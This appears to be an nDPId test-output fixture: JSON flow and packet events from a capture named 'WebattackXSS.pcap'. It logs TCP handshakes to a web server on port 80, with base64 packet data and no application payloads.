-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347774205,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347774205,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347774205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pr5AAD4GHxKsEAABwKgKMu10AFBYS10yAAAAAKACchC++QAAAgQFtAQCCAoBO\/uMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":2,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347774205,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7XSGo4hpWEtdM6AScSDf5QAAAgQFtAQCCAoD5c0AATv7jAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":3,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347774205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pr9AAD4GHxmsEAABwKgKMu10AFBYS10zhqOIaoAQAOV+7QAAAQEICgE7+4wD5c0A"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347775487,"flow_last_seen":1499347775487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347775487,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1499347775487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347775487,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kr1AAD4GMxOsEAABwKgKMu2CAFDDYm5xAAAAAKACchBBVQAAAgQFtAQCCAoBO\/zMAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6739,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":2,"flow_last_seen":1499347775487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347775487,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7YJb\/j+gw2JucqAScSDUbgAAAgQFtAQCCAoD5c5BATv8zAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":3,"flow_last_seen":1499347775487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347775487,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kr5AAD4GMxqsEAABwKgKMu2CAFDDYm5yW\/4\/oYAQAOVzdgAAAQEICgE7\/MwD5c5B"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6750,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347776753,"flow_last_seen":1499347776753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347776753,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6750,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1499347776753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347776753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KqpAAD4GmyasEAABwKgKMu2QAFCtQdSjAAAAAKACchDv+AAAAgQFtAQCCAoBO\/4JAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6751,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":2,"flow_last_seen":1499347776754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347776754,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7ZCBpSP4rUHUpKAScSB31wAAAgQFtAQCCAoD5c99ATv+CQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":3,"flow_last_seen":1499347776754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347776754,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KqtAAD4Gmy2sEAABwKgKMu2QAFCtQdSkgaUj+YAQAOUW3wAAAQEICgE7\/gkD5c99"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347779333,"flow_last_seen":1499347779333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347779333,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1499347779333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347779333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eChAAD4GTaisEAABwKgKMu2qAFDZQnimAAAAAKACchAdVgAAAgQFtAQCCAoBPACOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":2,"flow_last_seen":1499347779333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347779333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7aoAKzpS2UJ4p6AScSAN0AAAAgQFtAQCCAoD5dICATwAjgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":3,"flow_last_seen":1499347779333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347779333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eClAAD4GTa+sEAABwKgKMu2qAFDZQninACs6U4AQAOWs1wAAAQEICgE8AI4D5dIC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347780605,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347780605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Kg9AAD4Gm8GsEAABwKgKMu24AFBtBSvDAAAAAKACchDVKgAAAgQFtAQCCAoBPAHMAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":2,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347780605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7bgVufFFbQUrxKAScSD35AAAAgQFtAQCCAoD5dNAATwBzAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":3,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KhBAAD4Gm8isEAABwKgKMu24AFBtBSvEFbnxRoAQAOWW7AAAAQEICgE8AcwD5dNA"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347783176,"flow_last_seen":1499347783176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347783176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1499347783176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347783176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8URhAAD4GdLisEAABwKgKMu3SAFAelFVWAAAAAKACchD3bAAAAgQFtAQCCAoBPAROAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":2,"flow_last_seen":1499347783176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347783176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7dLS\/qxUHpRVV6AScSCfTwAAAgQFtAQCCAoD5dXDATwETgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":3,"flow_last_seen":1499347783177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347783177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0URlAAD4GdL+sEAABwKgKMu3SAFAelFVX0v6sVYAQAOU+VgAAAQEICgE8BE8D5dXD"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6810,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347784519,"flow_last_seen":1499347784519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347784519,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1499347784519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347784519,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CDdAAD4GvZmsEAABwKgKMu3gAFDyig2pAAAAAKACchBpxQAAAgQFtAQCCAoBPAWeAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":2,"flow_last_seen":1499347784520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347784520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7eBCNUBH8ooNqqAScSANLwAAAgQFtAQCCAoD5dcTATwFngEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":3,"flow_last_seen":1499347784520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347784520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CDhAAD4GvaCsEAABwKgKMu3gAFDyig2qQjVASIAQAOWsNQAAAQEICgE8BZ8D5dcT"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347787097,"flow_last_seen":1499347787097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347787097,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1499347787097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347787097,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87ftAAD4G19SsEAABwKgKMu36AFCLoOXYAAAAAKACchD14AAAAgQFtAQCCAoBPAgjAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":2,"flow_last_seen":1499347787098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347787098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7fr\/T2fti6Dl2aAScSCyBQAAAgQFtAQCCAoD5dmXATwIIwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":3,"flow_last_seen":1499347787098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347787098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07fxAAD4G19usEAABwKgKMu36AFCLoOXZ\/09n7oAQAOVRDQAAAQEICgE8CCMD5dmX"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347788375,"flow_last_seen":1499347788375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347788375,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
